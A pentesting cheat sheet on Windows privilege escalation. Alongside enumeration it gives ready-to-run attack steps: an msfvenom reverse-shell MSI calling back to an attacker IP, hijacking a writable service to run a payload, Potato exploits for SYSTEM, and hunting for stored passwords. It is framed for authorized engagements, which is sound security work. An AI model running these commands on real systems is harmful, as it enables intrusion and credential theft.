CyberCheatsheets

Windows Privilege Escalation Cheat Sheet

Enumeration and escalation paths from a low-privilege Windows user to SYSTEM or Administrator on authorized engagements.

Exploitation & Payloadsenumerationpost-exploitationprivesctokenswindowsUpdated 2026-06-17

Overview

Windows privilege escalation hinges on misconfigurations: unquoted service paths, weak service/registry permissions, AlwaysInstallElevated, stored credentials, and abusable privileges (SeImpersonate). Enumerate with winPEAS, confirm findings manually, then escalate. SeImpersonate (held by most service accounts) plus a Potato exploit is the classic path to SYSTEM.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

First: situational awareness

User, groups, and PRIVILEGES — look for SeImpersonate/SeAssignPrimaryToken/SeBackup

whoami /all

OS build and hotfixes — feed to a missing-patch check

systeminfo

Local users and admin group members

net user; net localgroup administrators

Network context and pivot routes

ipconfig /all; route print

Automated enumeration

All-in-one Windows privesc scanner

winPEASx64.exe

PowerUp common-misconfig checks

powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

C# PowerUp port (audit mode)

.\SharpUp.exe audit

Service misconfigurations

Find unquoted service paths with spaces

wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\" | findstr /i /v "\""

Inspect a service's binary path and start mode

sc qc <service>

Services writable by Everyone/Users (weak permissions)

accesschk.exe -uwcqv "Everyone" * /accepteula

Hijack a writable service to run your payload

sc config <service> binpath= "C:\Windows\Temp\rev.exe" && sc stop <service> && sc start <service>

Restore the original binpath afterwards.

SeImpersonate → SYSTEM (Potato)

PrintSpoofer: SYSTEM shell from SeImpersonate

.\PrintSpoofer64.exe -i -c cmd

GodPotato: works on modern Windows builds

.\GodPotato-NET4.exe -cmd "cmd /c whoami"

Stored credentials

Hunt passwords across the registry

reg query HKLM /f password /t REG_SZ /s 2>nul

Saved credentials usable with runas /savecred

cmdkey /list

If both =1, any MSI installs as SYSTEM

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated; reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Grep files for plaintext passwords

findstr /si password *.xml *.ini *.txt *.config 2>nul

Quick one-liners

List running services and their accounts

tasklist /svc

Check installed patches (for missing-KB exploits)

wmic qfe get HotFixID,InstalledOn

Find AlwaysInstallElevated MSI payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi

Decrypt a found GPP cPassword

gpp-decrypt <cpassword>

Scheduled tasks (look for writable task binaries)

schtasks /query /fo LIST /v

Tips

  • Run whoami /all first — SeImpersonate is held by most service accounts and leads straight to SYSTEM.
  • Unquoted service paths only matter if you can write to a folder earlier in the path.
  • AlwaysInstallElevated must be set in BOTH HKLM and HKCU to be exploitable.
  • winPEAS finds candidates; always confirm write permissions with accesschk before acting.

References

Related cheat sheets